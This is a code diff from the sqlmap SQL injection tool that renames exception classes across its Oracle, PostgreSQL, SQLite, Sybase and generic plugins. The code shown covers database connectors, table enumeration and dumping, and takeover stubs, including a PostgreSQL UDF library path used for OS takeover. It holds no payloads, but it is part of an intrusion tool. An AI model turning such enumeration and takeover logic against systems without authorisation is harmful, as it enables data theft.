raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression raise SqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
lastIndex = firstIndex + index lastIndex = firstIndex + index
old = "'%s'" % expression[firstIndex:lastIndex] old = "'%s'" % expression[firstIndex:lastIndex]
@ -47,7 +47,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find("))") index = expression[firstIndex:].find("))")
if index == -1: if index == -1:
raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression raise SqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
lastIndex = firstIndex + index + 1 lastIndex = firstIndex + index + 1
old = expression[firstIndex:lastIndex] old = expression[firstIndex:lastIndex]

10
plugins/dbms/oracle/takeover.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.takeover import Takeover as GenericTakeover from plugins.generic.takeover import Takeover as GenericTakeover
class Takeover(GenericTakeover): class Takeover(GenericTakeover):
@ -15,19 +15,19 @@ class Takeover(GenericTakeover):
def osCmd(self): def osCmd(self):
errMsg = "Operating system command execution functionality not " errMsg = "Operating system command execution functionality not "
errMsg += "yet implemented for Oracle" errMsg += "yet implemented for Oracle"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osShell(self): def osShell(self):
errMsg = "Operating system shell functionality not yet " errMsg = "Operating system shell functionality not yet "
errMsg += "implemented for Oracle" errMsg += "implemented for Oracle"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osPwn(self): def osPwn(self):
errMsg = "Operating system out-of-band control functionality " errMsg = "Operating system out-of-band control functionality "
errMsg += "not yet implemented for Oracle" errMsg += "not yet implemented for Oracle"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osSmb(self): def osSmb(self):
errMsg = "One click operating system out-of-band control " errMsg = "One click operating system out-of-band control "
errMsg += "functionality not yet implemented for Oracle" errMsg += "functionality not yet implemented for Oracle"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

6
plugins/dbms/postgresql/connector.py
View File

@ -14,7 +14,7 @@ except ImportError:
pass pass
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector): class Connector(GenericConnector):
@ -37,7 +37,7 @@ class Connector(GenericConnector):
try: try:
self.connector = psycopg2.connect(host=self.hostname, user=self.user, password=self.password, database=self.db, port=self.port) self.connector = psycopg2.connect(host=self.hostname, user=self.user, password=self.password, database=self.db, port=self.port)
except psycopg2.OperationalError, msg: except psycopg2.OperationalError, msg:
raise sqlmapConnectionException, msg raise SqlmapConnectionException, msg
self.connector.set_client_encoding('UNICODE') self.connector.set_client_encoding('UNICODE')
@ -60,7 +60,7 @@ class Connector(GenericConnector):
except (psycopg2.OperationalError, psycopg2.ProgrammingError), msg: except (psycopg2.OperationalError, psycopg2.ProgrammingError), msg:
logger.warn(("(remote) %s" % msg).strip()) logger.warn(("(remote) %s" % msg).strip())
except psycopg2.InternalError, msg: except psycopg2.InternalError, msg:
raise sqlmapConnectionException, msg raise SqlmapConnectionException, msg
self.connector.commit() self.connector.commit()

6
plugins/dbms/postgresql/filesystem.py
View File

@ -10,7 +10,7 @@ import os
from lib.core.common import randomInt from lib.core.common import randomInt
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
@ -31,7 +31,7 @@ class Filesystem(GenericFilesystem):
def unionWriteFile(self, wFile, dFile, fileType): def unionWriteFile(self, wFile, dFile, fileType):
errMsg = "PostgreSQL does not support file upload with UNION " errMsg = "PostgreSQL does not support file upload with UNION "
errMsg += "query SQL injection technique" errMsg += "query SQL injection technique"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def stackedWriteFile(self, wFile, dFile, fileType): def stackedWriteFile(self, wFile, dFile, fileType):
wFileSize = os.path.getsize(wFile) wFileSize = os.path.getsize(wFile)
@ -39,7 +39,7 @@ class Filesystem(GenericFilesystem):
if wFileSize > 8192: if wFileSize > 8192:
errMsg = "on PostgreSQL it is not possible to write files " errMsg = "on PostgreSQL it is not possible to write files "
errMsg += "bigger than 8192 bytes at the moment" errMsg += "bigger than 8192 bytes at the moment"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
self.oid = randomInt() self.oid = randomInt()

6
plugins/dbms/postgresql/syntax.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from plugins.generic.syntax import Syntax as GenericSyntax from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax): class Syntax(GenericSyntax):
@ -29,7 +29,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find("'") index = expression[firstIndex:].find("'")
if index == -1: if index == -1:
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression raise SqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
lastIndex = firstIndex + index lastIndex = firstIndex + index
old = "'%s'" % expression[firstIndex:lastIndex] old = "'%s'" % expression[firstIndex:lastIndex]
@ -52,7 +52,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find("))") index = expression[firstIndex:].find("))")
if index == -1: if index == -1:
raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression raise SqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
lastIndex = firstIndex + index + 1 lastIndex = firstIndex + index + 1
old = expression[firstIndex:lastIndex] old = expression[firstIndex:lastIndex]

4
plugins/dbms/postgresql/takeover.py
View File

@ -11,7 +11,7 @@ from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.data import paths from lib.core.data import paths
from lib.core.enums import OS from lib.core.enums import OS
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject from lib.request import inject
from plugins.generic.takeover import Takeover as GenericTakeover from plugins.generic.takeover import Takeover as GenericTakeover
@ -53,7 +53,7 @@ class Takeover(GenericTakeover):
majorVer = "8.2" majorVer = "8.2"
else: else:
errMsg = "unsupported feature on versions of PostgreSQL before 8.2" errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
if Backend.isOs(OS.WINDOWS): if Backend.isOs(OS.WINDOWS):
self.udfLocalFile += "/postgresql/windows/%d/%s/lib_postgresqludf_sys.dll" % (Backend.getArch(), majorVer) self.udfLocalFile += "/postgresql/windows/%d/%s/lib_postgresqludf_sys.dll" % (Backend.getArch(), majorVer)

10
plugins/dbms/sqlite/connector.py
View File

@ -15,8 +15,8 @@ import logging
from lib.core.convert import utf8encode from lib.core.convert import utf8encode
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.exception import sqlmapMissingDependence from lib.core.exception import SqlmapMissingDependence
from plugins.generic.connector import Connector as GenericConnector from plugins.generic.connector import Connector as GenericConnector
@ -56,12 +56,12 @@ class Connector(GenericConnector):
except ImportError: except ImportError:
errMsg = "sqlmap requires 'python-sqlite2' third-party library " errMsg = "sqlmap requires 'python-sqlite2' third-party library "
errMsg += "in order to directly connect to the database '%s'" % self.db errMsg += "in order to directly connect to the database '%s'" % self.db
raise sqlmapMissingDependence, errMsg raise SqlmapMissingDependence, errMsg
self.__sqlite = sqlite self.__sqlite = sqlite
self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout) self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout)
except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg: except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg:
raise sqlmapConnectionException, msg[0] raise SqlmapConnectionException, msg[0]
self.setCursor() self.setCursor()
self.connected() self.connected()
@ -79,7 +79,7 @@ class Connector(GenericConnector):
except self.__sqlite.OperationalError, msg: except self.__sqlite.OperationalError, msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0]) logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0])
except self.__sqlite.DatabaseError, msg: except self.__sqlite.DatabaseError, msg:
raise sqlmapConnectionException, msg[0] raise SqlmapConnectionException, msg[0]
self.connector.commit() self.connector.commit()

4
plugins/dbms/sqlite/enumeration.py
View File

@ -6,7 +6,7 @@ See the file 'doc/COPYING' for copying permission
""" """
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.enumeration import Enumeration as GenericEnumeration from plugins.generic.enumeration import Enumeration as GenericEnumeration
class Enumeration(GenericEnumeration): class Enumeration(GenericEnumeration):
@ -57,7 +57,7 @@ class Enumeration(GenericEnumeration):
def searchColumn(self): def searchColumn(self):
errMsg = "on SQLite you must specify the table and columns to dump" errMsg = "on SQLite you must specify the table and columns to dump"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def getHostname(self): def getHostname(self):
warnMsg = "on SQLite it is not possible to enumerate the hostname" warnMsg = "on SQLite it is not possible to enumerate the hostname"

6
plugins/dbms/sqlite/filesystem.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
@ -14,8 +14,8 @@ class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, rFile):
errMsg = "on SQLite it is not possible to read files" errMsg = "on SQLite it is not possible to read files"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def writeFile(self, wFile, dFile, fileType=None): def writeFile(self, wFile, dFile, fileType=None):
errMsg = "on SQLite it is not possible to write files" errMsg = "on SQLite it is not possible to write files"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

4
plugins/dbms/sqlite/syntax.py
View File

@ -9,7 +9,7 @@ import binascii
import re import re
from lib.core.common import isDBMSVersionAtLeast from lib.core.common import isDBMSVersionAtLeast
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from plugins.generic.syntax import Syntax as GenericSyntax from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax): class Syntax(GenericSyntax):
@ -42,7 +42,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex+2:].find("'") index = expression[firstIndex+2:].find("'")
if index == -1: if index == -1:
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression raise SqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
lastIndex = firstIndex + index + 3 lastIndex = firstIndex + index + 3
old = expression[firstIndex:lastIndex] old = expression[firstIndex:lastIndex]

10
plugins/dbms/sqlite/takeover.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.takeover import Takeover as GenericTakeover from plugins.generic.takeover import Takeover as GenericTakeover
class Takeover(GenericTakeover): class Takeover(GenericTakeover):
@ -14,18 +14,18 @@ class Takeover(GenericTakeover):
def osCmd(self): def osCmd(self):
errMsg = "on SQLite it is not possible to execute commands" errMsg = "on SQLite it is not possible to execute commands"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osShell(self): def osShell(self):
errMsg = "on SQLite it is not possible to execute commands" errMsg = "on SQLite it is not possible to execute commands"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osPwn(self): def osPwn(self):
errMsg = "on SQLite it is not possible to establish an " errMsg = "on SQLite it is not possible to establish an "
errMsg += "out-of-band connection" errMsg += "out-of-band connection"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osSmb(self): def osSmb(self):
errMsg = "on SQLite it is not possible to establish an " errMsg = "on SQLite it is not possible to establish an "
errMsg += "out-of-band connection" errMsg += "out-of-band connection"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

6
plugins/dbms/sybase/connector.py
View File

@ -16,7 +16,7 @@ import logging
from lib.core.convert import utf8encode from lib.core.convert import utf8encode
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector): class Connector(GenericConnector):
@ -42,7 +42,7 @@ class Connector(GenericConnector):
try: try:
self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)
except pymssql.OperationalError, msg: except pymssql.OperationalError, msg:
raise sqlmapConnectionException, msg raise SqlmapConnectionException, msg
self.setCursor() self.setCursor()
self.connected() self.connected()
@ -60,7 +60,7 @@ class Connector(GenericConnector):
except (pymssql.OperationalError, pymssql.ProgrammingError), msg: except (pymssql.OperationalError, pymssql.ProgrammingError), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg) logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg)
except pymssql.InternalError, msg: except pymssql.InternalError, msg:
raise sqlmapConnectionException, msg raise SqlmapConnectionException, msg
def select(self, query): def select(self, query):
self.execute(query) self.execute(query)

8
plugins/dbms/sybase/enumeration.py
View File

@ -17,8 +17,8 @@ from lib.core.data import logger
from lib.core.data import queries from lib.core.data import queries
from lib.core.dicts import SYBASE_TYPES from lib.core.dicts import SYBASE_TYPES
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import CURRENT_DB from lib.core.settings import CURRENT_DB
from lib.utils.pivotdumptable import pivotDumpTable from lib.utils.pivotdumptable import pivotDumpTable
from plugins.generic.enumeration import Enumeration as GenericEnumeration from plugins.generic.enumeration import Enumeration as GenericEnumeration
@ -172,7 +172,7 @@ class Enumeration(GenericEnumeration):
if ',' in conf.db: if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating " errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns" errMsg += "the tables' columns"
raise sqlmapMissingMandatoryOptionException, errMsg raise SqlmapMissingMandatoryOptionException, errMsg
conf.db = safeSQLIdentificatorNaming(conf.db) conf.db = safeSQLIdentificatorNaming(conf.db)
@ -197,7 +197,7 @@ class Enumeration(GenericEnumeration):
else: else:
errMsg = "unable to retrieve the tables " errMsg = "unable to retrieve the tables "
errMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) errMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
for tbl in tblList: for tbl in tblList:
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl) tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl)

6
plugins/dbms/sybase/filesystem.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
@ -14,8 +14,8 @@ class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, rFile):
errMsg = "on Sybase it is not possible to read files" errMsg = "on Sybase it is not possible to read files"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def writeFile(self, wFile, dFile, fileType=None): def writeFile(self, wFile, dFile, fileType=None):
errMsg = "on Sybase it is not possible to write files" errMsg = "on Sybase it is not possible to write files"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

6
plugins/dbms/sybase/syntax.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from plugins.generic.syntax import Syntax as GenericSyntax from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax): class Syntax(GenericSyntax):
@ -24,7 +24,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find("'") index = expression[firstIndex:].find("'")
if index == -1: if index == -1:
raise sqlmapSyntaxException("Unenclosed ' in '%s'" % expression) raise SqlmapSyntaxException("Unenclosed ' in '%s'" % expression)
lastIndex = firstIndex + index lastIndex = firstIndex + index
old = "'%s'" % expression[firstIndex:lastIndex] old = "'%s'" % expression[firstIndex:lastIndex]
@ -47,7 +47,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find("))") index = expression[firstIndex:].find("))")
if index == -1: if index == -1:
raise sqlmapSyntaxException("Unenclosed ) in '%s'" % expression) raise SqlmapSyntaxException("Unenclosed ) in '%s'" % expression)
lastIndex = firstIndex + index + 1 lastIndex = firstIndex + index + 1
old = expression[firstIndex:lastIndex] old = expression[firstIndex:lastIndex]

10
plugins/dbms/sybase/takeover.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.takeover import Takeover as GenericTakeover from plugins.generic.takeover import Takeover as GenericTakeover
class Takeover(GenericTakeover): class Takeover(GenericTakeover):
@ -14,18 +14,18 @@ class Takeover(GenericTakeover):
def osCmd(self): def osCmd(self):
errMsg = "on Sybase it is not possible to execute commands" errMsg = "on Sybase it is not possible to execute commands"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osShell(self): def osShell(self):
errMsg = "on Sybase it is not possible to execute commands" errMsg = "on Sybase it is not possible to execute commands"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osPwn(self): def osPwn(self):
errMsg = "on Sybase it is not possible to establish an " errMsg = "on Sybase it is not possible to establish an "
errMsg += "out-of-band connection" errMsg += "out-of-band connection"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osSmb(self): def osSmb(self):
errMsg = "on Sybase it is not possible to establish an " errMsg = "on Sybase it is not possible to establish an "
errMsg += "out-of-band connection" errMsg += "out-of-band connection"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

14
plugins/generic/connector.py
View File

@ -9,8 +9,8 @@ import os
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapFilePathException from lib.core.exception import SqlmapFilePathException
from lib.core.exception import sqlmapUndefinedMethod from lib.core.exception import SqlmapUndefinedMethod
class Connector: class Connector:
""" """
@ -59,24 +59,24 @@ class Connector:
def checkFileDb(self): def checkFileDb(self):
if not os.path.exists(self.db): if not os.path.exists(self.db):
errMsg = "the provided database file '%s' does not exist" % self.db errMsg = "the provided database file '%s' does not exist" % self.db
raise sqlmapFilePathException, errMsg raise SqlmapFilePathException, errMsg
def connect(self): def connect(self):
errMsg = "'connect' method must be defined " errMsg = "'connect' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg
def fetchall(self): def fetchall(self):
errMsg = "'fetchall' method must be defined " errMsg = "'fetchall' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg
def execute(self, query): def execute(self, query):
errMsg = "'execute' method must be defined " errMsg = "'execute' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg
def select(self, query): def select(self, query):
errMsg = "'select' method must be defined " errMsg = "'select' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg

26
plugins/generic/databases.py
View File

@ -32,9 +32,9 @@ from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import sqlmapUserQuitException from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import CURRENT_DB from lib.core.settings import CURRENT_DB
from lib.request import inject from lib.request import inject
from lib.techniques.brute.use import columnExists from lib.techniques.brute.use import columnExists
@ -166,7 +166,7 @@ class Databases:
kb.data.cachedDbs = [kb.data.currentDb] kb.data.cachedDbs = [kb.data.currentDb]
else: else:
errMsg = "unable to retrieve the database names" errMsg = "unable to retrieve the database names"
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
else: else:
kb.data.cachedDbs.sort() kb.data.cachedDbs.sort()
@ -188,7 +188,7 @@ class Databases:
elif Backend.isDbms(DBMS.ACCESS): elif Backend.isDbms(DBMS.ACCESS):
try: try:
tables = self.getTables(False) tables = self.getTables(False)
except sqlmapNoneDataException: except SqlmapNoneDataException:
tables = None tables = None
if not tables: if not tables:
@ -239,7 +239,7 @@ class Databases:
if test[0] in ("n", "N"): if test[0] in ("n", "N"):
return return
elif test[0] in ("q", "Q"): elif test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
else: else:
return tableExists(paths.COMMON_TABLES) return tableExists(paths.COMMON_TABLES)
@ -351,7 +351,7 @@ class Databases:
logger.error(errMsg) logger.error(errMsg)
return self.getTables(bruteForce=True) return self.getTables(bruteForce=True)
else: else:
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
else: else:
for db, tables in kb.data.cachedTables.items(): for db, tables in kb.data.cachedTables.items():
kb.data.cachedTables[db] = sorted(tables) if tables else tables kb.data.cachedTables[db] = sorted(tables) if tables else tables
@ -377,7 +377,7 @@ class Databases:
if ',' in conf.db: if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating " errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns" errMsg += "the tables' columns"
raise sqlmapMissingMandatoryOptionException, errMsg raise SqlmapMissingMandatoryOptionException, errMsg
conf.db = safeSQLIdentificatorNaming(conf.db) conf.db = safeSQLIdentificatorNaming(conf.db)
@ -415,7 +415,7 @@ class Databases:
else: else:
errMsg = "unable to retrieve the tables " errMsg = "unable to retrieve the tables "
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
for tbl in tblList: for tbl in tblList:
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)
@ -466,7 +466,7 @@ class Databases:
if test[0] in ("n", "N"): if test[0] in ("n", "N"):
return return
elif test[0] in ("q", "Q"): elif test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
else: else:
return columnExists(paths.COMMON_COLUMNS) return columnExists(paths.COMMON_COLUMNS)
@ -708,7 +708,7 @@ class Databases:
return kb.data.cachedColumns return kb.data.cachedColumns
def __tableGetCount(self, db, table): def _tableGetCount(self, db, table):
if Backend.isDbms(DBMS.DB2): if Backend.isDbms(DBMS.DB2):
query = "SELECT %s FROM %s.%s--" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(db.upper()), safeSQLIdentificatorNaming(table.upper(), True)) query = "SELECT %s FROM %s.%s--" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(db.upper()), safeSQLIdentificatorNaming(table.upper(), True))
else: else:
@ -748,12 +748,12 @@ class Databases:
if conf.tbl: if conf.tbl:
for table in conf.tbl.split(","): for table in conf.tbl.split(","):
self.__tableGetCount(conf.db, table) self._tableGetCount(conf.db, table)
else: else:
self.getTables() self.getTables()
for db, tables in kb.data.cachedTables.items(): for db, tables in kb.data.cachedTables.items():
for table in tables: for table in tables:
self.__tableGetCount(db, table) self._tableGetCount(db, table)
return kb.data.cachedCounts return kb.data.cachedCounts

18
plugins/generic/entries.py
View File

@ -29,10 +29,10 @@ from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.exception import sqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD
from lib.core.settings import CURRENT_DB from lib.core.settings import CURRENT_DB
from lib.core.settings import NULL from lib.core.settings import NULL
@ -67,7 +67,7 @@ class Entries:
if ',' in conf.db: if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating " errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns" errMsg += "the tables' columns"
raise sqlmapMissingMandatoryOptionException, errMsg raise SqlmapMissingMandatoryOptionException, errMsg
conf.db = safeSQLIdentificatorNaming(conf.db) conf.db = safeSQLIdentificatorNaming(conf.db)
@ -87,7 +87,7 @@ class Entries:
else: else:
errMsg = "unable to retrieve the tables " errMsg = "unable to retrieve the tables "
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
for tbl in tblList: for tbl in tblList:
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)
@ -313,7 +313,7 @@ class Entries:
attackDumpedTable() attackDumpedTable()
conf.dumper.dbTableValues(kb.data.dumpedTable) conf.dumper.dbTableValues(kb.data.dumpedTable)
except sqlmapConnectionException, e: except SqlmapConnectionException, e:
errMsg = "connection exception detected in dumping phase: " errMsg = "connection exception detected in dumping phase: "
errMsg += "'%s'" % e errMsg += "'%s'" % e
logger.critical(errMsg) logger.critical(errMsg)
@ -329,7 +329,7 @@ class Entries:
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
errMsg = "information_schema not available, " errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0" errMsg += "back-end DBMS is MySQL < 5.0"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
infoMsg = "sqlmap will dump entries of all tables from all databases now" infoMsg = "sqlmap will dump entries of all tables from all databases now"
logger.info(infoMsg) logger.info(infoMsg)
@ -353,7 +353,7 @@ class Entries:
kb.data.dumpedTable = {} kb.data.dumpedTable = {}
self.dumpTable() self.dumpTable()
except sqlmapNoneDataException: except SqlmapNoneDataException:
